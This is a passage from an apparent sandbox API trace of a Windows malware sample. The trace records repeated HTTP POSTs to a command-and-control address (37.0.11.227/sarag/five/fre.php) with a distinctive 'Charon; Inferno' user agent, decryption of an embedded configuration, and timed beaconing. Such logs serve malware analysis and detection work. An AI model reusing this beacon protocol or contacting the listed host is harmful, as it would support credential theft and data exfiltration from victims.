(in: s=0x32c, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0185.363] GetProcessHeap () returned 0x690000 [0185.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x690000) returned 1 [0185.364] GetProcessHeap () returned 0x690000 [0185.364] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0185.365] GetProcessHeap () returned 0x690000 [0185.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0185.365] GetProcessHeap () returned 0x690000 [0185.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0185.366] closesocket (s=0x32c) returned 0 [0185.366] GetProcessHeap () returned 0x690000 [0185.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab330 | out: hHeap=0x690000) returned 1 [0185.366] GetProcessHeap () returned 0x690000 [0185.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0185.367] GetProcessHeap () returned 0x690000 [0185.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.367] GetProcessHeap () returned 0x690000 [0185.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0185.368] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1028) returned 0x32c [0185.370] Sleep (dwMilliseconds=0xea60) [0185.372] GetProcessHeap () returned 0x690000 [0185.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0185.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.373] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0185.386] GetProcessHeap () returned 0x690000 [0185.386] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0185.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.387] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.388] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.390] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.390] GetProcessHeap () returned 0x690000 [0185.390] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0185.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.391] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0185.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.392] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.393] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0185.393] GetProcessHeap () returned 0x690000 [0185.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.394] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.394] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.395] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.396] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.397] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.397] GetProcessHeap () returned 0x690000 [0185.397] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0185.397] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.397] GetProcessHeap () returned 0x690000 [0185.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0185.400] GetProcessHeap () returned 0x690000 [0185.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.401] GetProcessHeap () returned 0x690000 [0185.401] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0185.401] GetProcessHeap () returned 0x690000 [0185.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0185.402] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.402] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.407] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0185.412] GetProcessHeap () returned 0x690000 [0185.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0185.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.414] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.414] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.416] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.416] GetProcessHeap () returned 0x690000 [0185.416] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0185.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.417] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0185.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.418] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.419] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0185.419] GetProcessHeap () returned 0x690000 [0185.420] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.420] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0185.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.421] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0185.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.422] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0185.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.423] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0185.423] GetProcessHeap () returned 0x690000 [0185.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0185.423] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9cd0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0185.423] GetProcessHeap () returned 0x690000 [0185.423] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0185.423] socket (af=2, type=1, protocol=6) returned 0x330 [0185.424] connect (s=0x330, name=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0185.455] FreeAddrInfoW (pAddrInfo=0x6a9cd0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aead8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0185.466] GetProcessHeap () returned 0x690000 [0185.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0185.466] GetProcessHeap () returned 0x690000 [0185.466] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0185.467] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.468] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.469] GetProcessHeap () returned 0x690000 [0185.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0185.469] GetProcessHeap () returned 0x690000 [0185.469] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.469] GetProcessHeap () returned 0x690000 [0185.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0185.470] GetProcessHeap () returned 0x690000 [0185.470] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0185.470] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.471] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.471] GetProcessHeap () returned 0x690000 [0185.471] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0185.471] GetProcessHeap () returned 0x690000 [0185.472] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.472] send (s=0x330, buf=0x6abd08*, len=242, flags=0) returned 242 [0185.472] send (s=0x330, buf=0x6aba40*, len=159, flags=0) returned 159 [0185.472] GetProcessHeap () returned 0x690000 [0185.472] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0185.473] recv (in: s=0x330, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0185.547] GetProcessHeap () returned 0x690000 [0185.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0185.547] GetProcessHeap () returned 0x690000 [0185.547] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0185.548] GetProcessHeap () returned 0x690000 [0185.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0185.548] GetProcessHeap () returned 0x690000 [0185.548] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0185.549] closesocket (s=0x330) returned 0 [0185.550] GetProcessHeap () returned 0x690000 [0185.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0185.550] GetProcessHeap () returned 0x690000 [0185.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.550] GetProcessHeap () returned 0x690000 [0185.550] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.550] GetProcessHeap () returned 0x690000 [0185.551] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0185.551] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b27b0, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x102c) returned 0x330 [0185.553] Sleep (dwMilliseconds=0xea60) [0185.555] GetProcessHeap () returned 0x690000 [0185.555] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0185.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.556] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.565] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0185.575] GetProcessHeap () returned 0x690000 [0185.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0185.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.576] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.577] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.578] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.578] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.578] GetProcessHeap () returned 0x690000 [0185.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0185.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.580] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0185.581] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.581] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.586] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0185.586] GetProcessHeap () returned 0x690000 [0185.586] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.587] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.587] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.588] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.588] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.589] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0185.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.590] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0185.590] GetProcessHeap () returned 0x690000 [0185.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0185.590] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0185.591] GetProcessHeap () returned 0x690000 [0185.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0185.591] GetProcessHeap () returned 0x690000 [0185.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.592] GetProcessHeap () returned 0x690000 [0185.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.592] GetProcessHeap () returned 0x690000 [0185.592] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0185.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.593] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.599] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0185.606] GetProcessHeap () returned 0x690000 [0185.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0185.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.607] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0185.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.609] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.610] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.610] GetProcessHeap () returned 0x690000 [0185.610] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0185.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.612] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0185.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.613] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0185.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0185.614] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0185.614] GetProcessHeap () returned 0x690000 [0185.614] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0185.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.615] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0185.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.616] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0185.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.617] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0185.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0185.618] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0185.618] GetProcessHeap () returned 0x690000 [0185.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0185.618] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0185.618] GetProcessHeap () returned 0x690000 [0185.618] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0185.618] socket (af=2, type=1, protocol=6) returned 0x334 [0185.619] connect (s=0x334, name=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0185.655] FreeAddrInfoW (pAddrInfo=0x6a9938*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae8f8*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0185.655] GetProcessHeap () returned 0x690000 [0185.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0185.655] GetProcessHeap () returned 0x690000 [0185.655] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0185.656] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.657] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0185.657] GetProcessHeap () returned 0x690000 [0185.657] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0185.657] GetProcessHeap () returned 0x690000 [0185.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.658] GetProcessHeap () returned 0x690000 [0185.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0185.658] GetProcessHeap () returned 0x690000 [0185.658] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0185.659] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0185.660] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0185.660] GetProcessHeap () returned 0x690000 [0185.660] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0185.660] GetProcessHeap () returned 0x690000 [0185.660] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0185.660] send (s=0x334, buf=0x6abd08*, len=242, flags=0) returned 242 [0185.661] send (s=0x334, buf=0x6aba40*, len=159, flags=0) returned 159 [0185.661] GetProcessHeap () returned 0x690000 [0185.661] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b27b0 [0185.661] recv (in: s=0x334, buf=0x6b27b0, len=4048, flags=0 | out: buf=0x6b27b0*) returned 204 [0185.757] GetProcessHeap () returned 0x690000 [0185.757] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0185.757] GetProcessHeap () returned 0x690000 [0185.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0185.758] GetProcessHeap () returned 0x690000 [0185.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0185.758] GetProcessHeap () returned 0x690000 [0185.758] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0185.758] closesocket (s=0x334) returned 0 [0185.759] GetProcessHeap () returned 0x690000 [0185.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0185.759] GetProcessHeap () returned 0x690000 [0185.759] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0185.759] GetProcessHeap () returned 0x690000 [0185.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0185.760] GetProcessHeap () returned 0x690000 [0185.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, 